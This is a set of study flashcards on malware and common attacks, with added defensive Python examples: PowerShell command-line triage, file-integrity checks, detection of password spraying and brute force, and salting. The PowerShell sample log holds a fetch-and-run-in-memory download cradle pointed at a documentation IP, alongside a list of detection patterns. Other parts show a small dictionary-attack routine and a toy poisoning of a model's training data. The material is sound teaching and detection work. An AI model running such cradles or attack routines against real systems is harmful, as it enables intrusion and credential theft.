1.2 Malware & common attacks Flashcards
What is malware?
Malicious software. It can aim to gather information, take control of your computer, or enrol it in a botnet.
What are the different types of malware?
- viruses
- crypto-malware
- worms
- trojan horse
- rootkit
- keylogger
- adware/spyware
- botnet
How does malware get onto a system?
It can be downloaded by clicking a link or attachment in an email, through a web page pop-up, or delivered by exploiting a vulnerability (no click needed).
What is a virus?
Malware that reproduces itself by attaching to files and spreads through the file system or the network; unlike a worm, it usually needs a user to run the infected file.
What are the different virus types?
- program viruses (embedded in applications)
- boot sector viruses (run when the OS boots)
- script viruses
- macro viruses (inside a macro in a Microsoft Office document)
- fileless viruses
What is a fileless virus?
A type of malware that uses native, legitimate tools built into the system (such as PowerShell) to carry out the attack. Unlike traditional malware, it does not write an executable to disk, which makes it hard to detect with file-based antivirus.
How does fileless malware work?
1/ the user clicks a malicious website link
2/ the website exploits a vulnerability (in the browser or a plugin)
3/ it launches PowerShell, which downloads the payload straight into RAM
4/ the PowerShell script runs in memory; nothing is written to disk
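Because nothing lands on disk, the practical detection point for step 3 and 4 is the PowerShell command line itself (process-creation or script-block logging). The triage logic below is an added example, not part of the original flashcards: it decodes the base64/UTF-16LE `-EncodedCommand` blob and scores a few well-known download-and-run-in-memory indicators. The log lines, host names and the 192.0.2.10 URL are constructed for the example.

```python
import base64
import re

# Indicators of download-and-execute-in-memory PowerShell tradecraft.
SUSPICIOUS_PATTERNS = [
    r"\bIEX\b",
    r"Invoke-Expression",
    r"DownloadString",
    r"Net\.WebClient",
    r"Invoke-WebRequest",
    r"FromBase64String",
    r"-nop\b",                          # -NoProfile short form
    r"-w(?:indowstyle)?\s+hidden",      # hidden window
    r"\bBypass\b",                      # -ExecutionPolicy Bypass
]
SUSPICIOUS_RE = re.compile("|".join(SUSPICIOUS_PATTERNS), re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by the base64 blob
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(cmdline):
    """Return (score, indicators, decoded) for one PowerShell command line.

    Indicators are searched in the visible command line (with the base64 blob
    masked so it cannot produce false hits) and inside the decoded payload."""
    decoded = decode_encoded_command(cmdline)
    visible = ENCODED_RE.sub("-EncodedCommand <blob>", cmdline)
    text = visible if decoded is None else visible + "\n" + decoded
    hits = sorted({m.group(0).lower() for m in SUSPICIOUS_RE.finditer(text)})
    if decoded is not None:
        hits.insert(0, "encodedcommand")  # encoding the command is itself an evasion signal
    return len(hits), hits, decoded


def triage(lines, threshold=2):
    """Parse '<timestamp> <host> <command line>' records; return those scoring >= threshold."""
    flagged = []
    for line in lines:
        parts = line.split(" ", 2)
        if len(parts) != 3:
            continue
        ts, host, cmdline = parts
        score, hits, decoded = score_command(cmdline)
        if score >= threshold:
            flagged.append({"ts": ts, "host": host, "score": score, "hits": hits, "decoded": decoded})
    return flagged


def _encode(ps):
    """Build an -EncodedCommand blob the way PowerShell expects it (UTF-16LE, then base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample records (not real logs): one benign admin command, one stage-in-memory
# download with a hidden window, one scheduled backup script.
SAMPLE_LOGS = [
    "2024-05-01T10:02:11Z ws01 powershell.exe -NoProfile -Command Get-Service",
    "2024-05-01T10:05:42Z ws01 powershell.exe -nop -w hidden -ExecutionPolicy Bypass -EncodedCommand "
    + _encode("IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage.ps1')"),
    "2024-05-01T10:07:03Z ws02 powershell.exe -File C:\\Scripts\\backup.ps1",
]

if __name__ == "__main__":
    for rec in triage(SAMPLE_LOGS):
        print(rec["host"], rec["score"], rec["hits"])
        print("  decoded:", rec["decoded"])
```

Only the second record is flagged: three indicators are visible on the command line and three more only appear after decoding, which is why a detection that does not decode `-EncodedCommand` misses most of the signal.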
What is a worm?
A type of malware that self-replicates and spreads through the network on its own, without user action.
How can a worm be detected?
By firewalls and IDS/IPS before the infection reaches the host, provided a signature for that worm exists: detection is signature-based, so a brand-new worm can get through until a signature is published.
What is ransomware?
Malware that encrypts a victim's data and holds it for ransom.
What is crypto-malware?
A form of ransomware: the data are encrypted and the ransom must be paid (typically in cryptocurrency) to obtain the decryption key.
How to protect against ransomware?
- have a backup (kept offline, so the ransomware cannot encrypt it too)
- update the OS
- update applications
- update antivirus/anti-malware to get the latest signatures
What is a Trojan horse?
Software that pretends to be something else; in reality you are installing malware. Once inside, it can open a backdoor, download further files, etc.
What is a PUP?
A Potentially Unwanted Program, which can be downloaded by a Trojan (e.g. an aggressive browser toolbar, unwanted ads, etc.).
What is a backdoor?
An undocumented way of gaining access to a computer, so the attacker does not have to redo the whole attack each time; it is often opened by malware. Some legitimate software has also shipped with backdoors, and in 2003 someone tried to slip one into the Linux kernel source (it was caught); Linux itself does not include one.
How to prevent a Trojan?
- update the antivirus with the latest signatures
- have a backup
- don't click on unknown links or run software from untrusted sources
What is a rootkit?
A type of malware that embeds itself in the kernel, beneath the OS tools and antivirus that would normally see it, so it can hide itself and modify files and processes invisibly.
Can a rootkit be identified?
Yes: some antivirus and dedicated rootkit removers can find them, and UEFI Secure Boot blocks an unsigned (tampered) bootloader or kernel from loading in the first place.
What is spyware?
A type of malware that steals sensitive information and gathers data. It can monitor internet activity and use a keylogger to capture credentials when the victim logs in to a website. It is often installed via a Trojan.
How to protect against spyware/adware?
- antivirus/anti-malware with the latest signatures
- know exactly what you are installing
- do backups
What are bots?
A type of malware that infects a device so that it becomes a bot remotely controlled by the attacker.
What is a botnet?
A group of bots working together under one command and control (C2). It can be used for DDoS, relaying spam, or proxying network traffic.
How to prevent bots?
- update the OS
- update antivirus/anti-malware
- identify an existing infection
- prevent command and control (block the C2 traffic at the firewall or IPS)
What is a logic bomb?
A type of malware that is triggered when a logical condition is met, such as after a number of transactions have been processed, or on a specific date. Difficult to spot because a logic bomb can delete itself after firing and there is no predefined antivirus signature for it.
How to prevent a logic bomb?
- formal change control and procedures (is there a process in place for changes to the server?)
- host-based intrusion detection and constant auditing of systems, so an unauthorized change to a script or binary is noticed before the condition fires
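The auditing point above is what file-integrity monitoring does: record a fingerprint of every script the server runs, then compare. The snippet below is an added example, not part of the original flashcards. It hashes a constructed set of batch scripts, signs the baseline with an HMAC so an intruder who edits a script cannot also quietly "fix" the baseline without the key, and reports what changed. The paths, script contents, the `drop_all_tables` placeholder and the key are all invented for the example; in practice the key and the signed baseline live off the monitored host.

```python
import hashlib
import hmac

# Constructed snapshot of a server's scheduled scripts: path -> contents (not real files).
BASELINE_FILES = {
    "/opt/batch/settle.sh": b"#!/bin/sh\nprocess_transactions\n",
    "/opt/batch/report.py": b"print('daily report')\n",
}

# Same server later: settle.sh now carries a date-triggered condition (the logic bomb) and a
# new hidden script has appeared. 'drop_all_tables' is a placeholder command for the example.
TAMPERED_FILES = {
    "/opt/batch/settle.sh": b'#!/bin/sh\nif [ "$(date +%m%d)" = "0401" ]; then drop_all_tables; fi\nprocess_transactions\n',
    "/opt/batch/report.py": b"print('daily report')\n",
    "/opt/batch/.cleanup.sh": b"#!/bin/sh\n: placeholder\n",
}

# Assumed HMAC key for the example; a real deployment keeps it off the monitored host.
DEMO_KEY = b"example-key-not-for-real-use"


def fingerprint(files):
    """Map each path to the SHA-256 of its contents."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


def sign_baseline(fp, key):
    """HMAC over the canonical (sorted) listing, so the baseline itself is tamper-evident."""
    canon = "\n".join(f"{p} {h}" for p, h in sorted(fp.items())).encode()
    return hmac.new(key, canon, hashlib.sha256).hexdigest()


def verify_baseline(fp, key, tag):
    """True only if the baseline listing matches the stored HMAC tag."""
    return hmac.compare_digest(sign_baseline(fp, key), tag)


def compare(baseline_fp, current_files):
    """Diff a trusted baseline against the current state of the files."""
    cur = fingerprint(current_files)
    return {
        "modified": sorted(p for p in baseline_fp if p in cur and cur[p] != baseline_fp[p]),
        "added": sorted(p for p in cur if p not in baseline_fp),
        "removed": sorted(p for p in baseline_fp if p not in cur),
    }


if __name__ == "__main__":
    baseline = fingerprint(BASELINE_FILES)
    tag = sign_baseline(baseline, DEMO_KEY)
    print("baseline intact:", verify_baseline(baseline, DEMO_KEY, tag))
    print("changes:", compare(baseline, TAMPERED_FILES))
    # An attacker who swaps in a baseline matching the tampered files cannot forge the tag.
    print("forged baseline accepted:", verify_baseline(fingerprint(TAMPERED_FILES), DEMO_KEY, tag))
```

The check runs without any signature for the logic bomb itself: it only needs to know that `settle.sh` changed outside the change-control window, which is exactly the signal the flashcard asks for.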
What is the best way to store a password?
By hashing it with a salted, one-way (irreversible) hash, so the original password cannot be recovered from what is stored.
What is a password-spraying attack (this is not malware)?
When an attacker tries a few common passwords against many accounts on one domain. Using a list of common weak passwords, such as 123456 or password1, the attacker can potentially get into hundreds of accounts in one campaign. Because each account only sees one or two attempts, the account-lockout threshold is never reached.
What is a brute-force attack?
Trying every possible password combination until the hash matches the password's hash. Online, it produces many failed logins on one account, so it can be detected and the account locked; offline, against a stolen hash, there is no lockout, only the cost of computing each hash.
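The two attacks leave opposite footprints in an authentication log: brute force is many failures against one account, spraying is one or two failures against many accounts from the same source, deliberately below the lockout threshold. The detection below is an added example, not part of the original flashcards; the log format, IP addresses, user names and thresholds are constructed for it.

```python
import re
from collections import defaultdict

# Constructed record format: "<timestamp> src=<ip> user=<name> result=<OK|FAIL>"
LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$")


def parse(lines):
    """Parse well-formed records into dicts; silently skip lines that do not match."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def detect(lines, lockout_threshold=5, spray_min_users=5, spray_max_per_user=2):
    """Return accounts that look brute-forced and sources that look like password spraying.

    brute force : >= lockout_threshold failures on a single account
    spraying    : one source failing against >= spray_min_users distinct accounts while
                  staying at <= spray_max_per_user attempts each (so no account locks)."""
    failures = [e for e in parse(lines) if e["result"] == "FAIL"]
    fails_per_user = defaultdict(int)
    users_per_src = defaultdict(lambda: defaultdict(int))
    for e in failures:
        fails_per_user[e["user"]] += 1
        users_per_src[e["src"]][e["user"]] += 1
    brute = sorted(u for u, n in fails_per_user.items() if n >= lockout_threshold)
    spray = sorted(
        src for src, per_user in users_per_src.items()
        if len(per_user) >= spray_min_users and max(per_user.values()) <= spray_max_per_user
    )
    return {"brute_force_users": brute, "spraying_sources": spray}


# Constructed sample log: a typo by a legitimate user, a brute force on 'bob' from one IP,
# and a spray of one guess per account from another IP.
SAMPLE_LOGS = (
    ["2024-05-01T09:00:01Z src=192.0.2.20 user=alice result=FAIL",
     "2024-05-01T09:00:09Z src=192.0.2.20 user=alice result=OK"]
    + [f"2024-05-01T09:01:{i:02d}Z src=198.51.100.7 user=bob result=FAIL" for i in range(6)]
    + [f"2024-05-01T09:02:{i:02d}Z src=203.0.113.9 user={u} result=FAIL"
       for i, u in enumerate(["alice", "carol", "dave", "erin", "frank", "grace"])]
)

if __name__ == "__main__":
    print(detect(SAMPLE_LOGS))
```

Note that a per-account lockout rule alone would see at most two failures on any sprayed account and never fire; the spraying rule has to pivot on the source and count distinct accounts instead.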
What is a dictionary attack?
Using a wordlist of common words and passwords instead of every possible combination; many wordlists are available on the internet.
What is a rainbow table?
An optimized, pre-built set of hashes stored in a table, used to look up the password that corresponds to a captured hash without recomputing it.
What is "adding a salt"?
Adding random data to a password before hashing it, so that the hash cannot be looked up in a rainbow table (the table would have to be rebuilt for every salt) and the brute-force attack is slowed down (e.g. password + MeNvg).
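To see the four cards above work against each other, the snippet below is an added example, not part of the original flashcards. It builds a precomputed hash lookup for a tiny wordlist (a plain lookup table, which stands in for a rainbow table's chains but defeats the same thing), shows that one unsalted MD5 is found instantly while the salted one is not, and then shows that a salted, slow PBKDF2 hash still falls to a dictionary attack when the password itself is in the wordlist. The wordlist and passwords are constructed for the example; the default iteration count is an assumption.

```python
import hashlib
import hmac
import os

# Constructed wordlist of weak passwords.
WORDLIST = ["123456", "password1", "letmein", "Winter2024!", "qwerty"]


def unsalted_md5(pw):
    """What a rainbow table targets: fast hash, no salt, same output for everyone."""
    return hashlib.md5(pw.encode()).hexdigest()


def salted_md5(pw, salt):
    """Same fast hash with the flashcard's salt prepended; still too fast, but no longer precomputable."""
    return hashlib.md5(salt + pw.encode()).hexdigest()


def build_lookup_table(words):
    """Precomputed hash -> password map (a rainbow table compresses this with chains; same idea)."""
    return {unsalted_md5(w): w for w in words}


def lookup(table, digest):
    """Rainbow-table style lookup: constant time per hash, no hashing at attack time."""
    return table.get(digest)


def hash_password(pw, salt=None, iterations=600_000):
    """Store pbkdf2_sha256$<iterations>$<salt hex>$<derived key hex>. Iteration count is an assumption."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(pw, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def dictionary_attack(stored, words):
    """Offline dictionary attack: one full PBKDF2 per candidate, so the cost scales with iterations."""
    for w in words:
        if verify_password(w, stored):
            return w
    return None


if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    print("unsalted md5 found:", lookup(table, unsalted_md5("password1")))
    print("salted md5 found:  ", lookup(table, salted_md5("password1", b"MeNvg")))
    weak = hash_password("password1", iterations=1000)
    strong = hash_password("correct horse battery staple", iterations=1000)
    print("dictionary vs weak:  ", dictionary_attack(weak, WORDLIST))
    print("dictionary vs strong:", dictionary_attack(strong, WORDLIST))
```

Two different stored strings for the same password are expected (each call draws a fresh salt), which is what stops a single table from serving every user. Salting does not save a password that is in the attacker's wordlist; it only forces the attacker to pay the full hash cost per guess per user.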
What are the different types of physical attacks?
- malicious USB cable: a cable that performs an unwanted function once connected (downloading malware, data exfiltration, GPS tracking, etc.). The computer usually sees it as a keyboard or mouse, which is why it is trusted.
- malicious USB flash drive: a USB stick carrying malware that runs once it is connected to the PC
- skimming: stealing credit card information during a normal transaction
- card cloning: copying a credit card onto a blank one
What is a training-data poisoning attack?
An attack directed at machine learning. Because ML needs a lot of data to train, an attacker who can inject modified or mislabelled data into the training set can corrupt what the model learns and steer its predictions.
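The toy below is an added example, not part of the original flashcards, of how injected mislabelled data steers a model. It uses a nearest-centroid classifier (pure Python, no ML library) over a constructed two-class training set, finds how many poisoned points the attacker must add to flip the prediction for a chosen input, and shows one cheap mitigation: only accept new training data whose label agrees with a model trained on a trusted seed set. The data points, labels and the (7, 7) target are all made up for the example.

```python
def centroid(points):
    """Mean of a list of equal-length feature tuples."""
    n = len(points)
    return tuple(sum(p[i] for p in points) / n for i in range(len(points[0])))


def dist2(a, b):
    """Squared Euclidean distance."""
    return sum((x - y) ** 2 for x, y in zip(a, b))


def train(samples):
    """samples: list of (features, label). Model = one centroid per label."""
    by_label = {}
    for x, y in samples:
        by_label.setdefault(y, []).append(x)
    return {y: centroid(xs) for y, xs in by_label.items()}


def predict(model, x):
    """Label whose centroid is nearest to x."""
    return min(model, key=lambda label: dist2(model[label], x))


def poison(samples, x, wrong_label, k):
    """Attacker injects k copies of x carrying the label they want the model to learn."""
    return samples + [(x, wrong_label)] * k


def min_poison_points(samples, x, target_label, limit=100):
    """Smallest k for which the poisoned model predicts target_label for x (None if > limit)."""
    for k in range(1, limit + 1):
        if predict(train(poison(samples, x, target_label, k)), x) == target_label:
            return k
    return None


def filter_with_trusted(trusted, incoming):
    """Mitigation: keep only incoming samples whose label agrees with the trusted model."""
    model = train(trusted)
    return [(x, y) for x, y in incoming if predict(model, x) == y]


# Constructed training set: a 'benign' cluster around (1.5, 1.5), a 'malicious' one around (8.5, 8.5).
CLEAN = [
    ((1, 1), "benign"), ((1, 2), "benign"), ((2, 1), "benign"), ((2, 2), "benign"),
    ((8, 8), "malicious"), ((8, 9), "malicious"), ((9, 8), "malicious"), ((9, 9), "malicious"),
]
TARGET = (7, 7)  # a sample the attacker wants classified as benign

if __name__ == "__main__":
    print("clean prediction:", predict(train(CLEAN), TARGET))
    k = min_poison_points(CLEAN, TARGET, "benign")
    print("poison points needed:", k)
    print("poisoned prediction:", predict(train(poison(CLEAN, TARGET, "benign", k)), TARGET))
    kept = filter_with_trusted(CLEAN, [(TARGET, "benign")] * k)
    print("poison surviving trusted-label filter:", len(kept))
```

With only eight clean samples the attacker needs 11 poisoned ones, a large fraction of the data; the number grows with the size of the clean set, which is the sense in which poisoning "needs a lot of data" to move the model. The label-agreement filter is a heuristic, not a guarantee: it rejects blatant mislabelling but can also drop legitimate data that falls near the decision boundary.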
What is the difference between cloud-based and on-premises (from a security-management point of view)?
- cloud: security is centralized and run by the provider, so it costs the customer less, but the customer still has to secure its own configuration, data and identities (shared responsibility)
- on-premises: the client pays for and operates all security and infrastructure, and keeps full control of it
What are cryptographic attacks?
- collision: two different plaintexts produce the same hash value, which breaks the hash's use as a unique fingerprint (integrity checks, signatures)
- downgrade attack: a scenario in which a malicious actor forces a server or client to use a lower version of a cryptographic protocol (such as TLS or SSL), a weaker cipher suite (such as an export-grade cipher instead of a standard one), or a weaker connection type (HTTP instead of HTTPS). Mitigation: disable the old versions and ciphers on both sides, and use HSTS so the browser refuses to fall back to plain HTTP.